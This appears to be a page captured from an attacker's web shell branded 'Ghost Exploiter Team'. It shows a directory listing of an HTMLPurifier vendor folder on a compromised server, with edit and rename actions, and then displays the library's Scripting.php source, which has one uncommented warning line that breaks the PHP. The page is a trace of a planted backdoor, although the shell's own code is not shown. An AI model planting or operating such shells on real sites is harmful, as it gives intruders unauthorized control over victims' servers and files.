Shell Bypass 403 GE-C666C

Ghost Exploiter Team Official

Directory >> /var/www/html/back/vendor/ezyang/htmlpurifier/library/HTMLPurifier/HTMLModule/

File / Folder	Size	Action
.	-
Tidy	--	ren
Bdo.php	1.004KB	edt ren
CommonAttributes.php	0.705KB	edt ren
Edit.php	1.4KB	edt ren
Forms.php	5.699KB	edt ren
Hypertext.php	0.973KB	edt ren
Iframe.php	1.252KB	edt ren
Image.php	1.355KB	edt ren
Legacy.php	5.718KB	edt ren
List.php	1.864KB	edt ren
Name.php	0.653KB	edt ren
Nofollow.php	0.495KB	edt ren
NonXMLCommonAttributes.php	0.346KB	edt ren
Object.php	1.487KB	edt ren
Presentation.php	1.382KB	edt ren
Proprietary.php	0.972KB	edt ren
Ruby.php	1.028KB	edt ren
SafeEmbed.php	1.071KB	edt ren
SafeObject.php	1.901KB	edt ren
SafeScripting.php	1.233KB	edt ren
Scripting.php	2.282KB	edt ren
StyleAttribute.php	0.762KB	edt ren
Tables.php	2.297KB	edt ren
Target.php	0.585KB	edt ren
TargetBlank.php	0.51KB	edt ren
TargetNoopener.php	0.504KB	edt ren
TargetNoreferrer.php	0.514KB	edt ren
Text.php	3.354KB	edt ren
Tidy.php	7.02KB	edt ren
XMLCommonAttributes.php	0.344KB	edt ren

<?php

WARNING: THIS MODULE IS EXTREMELY DANGEROUS AS IT ENABLES INLINE SCRIPTING
INSIDE HTML PURIFIER DOCUMENTS. USE ONLY WITH TRUSTED USER INPUT!!!

/**
 * XHTML 1.1 Scripting module, defines elements that are used to contain
 * information pertaining to executable scripts or the lack of support
 * for executable scripts.
 * @note This module does not contain inline scripting elements
 */
class HTMLPurifier_HTMLModule_Scripting extends HTMLPurifier_HTMLModule
{
    /**
     * @type string
     */
    public $name = 'Scripting';

/**
     * @type array
     */
    public $elements = array('script', 'noscript');

/**
     * @type array
     */
    public $content_sets = array('Block' => 'script | noscript', 'Inline' => 'script | noscript');

/**
     * @type bool
     */
    public $safe = false;

/**
     * @param HTMLPurifier_Config $config
     */
    public function setup($config)
    {
        // TODO: create custom child-definition for noscript that
        // auto-wraps stray #PCDATA in a similar manner to
        // blockquote's custom definition (we would use it but
        // blockquote's contents are optional while noscript's contents
        // are required)

// TODO: convert this to new syntax, main problem is getting
        // both content sets working

// In theory, this could be safe, but I don't see any reason to
        // allow it.
        $this->info['noscript'] = new HTMLPurifier_ElementDef();
        $this->info['noscript']->attr = array(0 => array('Common'));
        $this->info['noscript']->content_model = 'Heading | List | Block';
        $this->info['noscript']->content_model_type = 'required';

$this->info['script'] = new HTMLPurifier_ElementDef();
        $this->info['script']->attr = array(
            'defer' => new HTMLPurifier_AttrDef_Enum(array('defer')),
            'src' => new HTMLPurifier_AttrDef_URI(true),
            'type' => new HTMLPurifier_AttrDef_Enum(array('text/javascript'))
        );
        $this->info['script']->content_model = '#PCDATA';
        $this->info['script']->content_model_type = 'optional';
        $this->info['script']->attr_transform_pre[] =
        $this->info['script']->attr_transform_post[] =
            new HTMLPurifier_AttrTransform_ScriptRequired();
    }
}

// vim: et sw=4 sts=4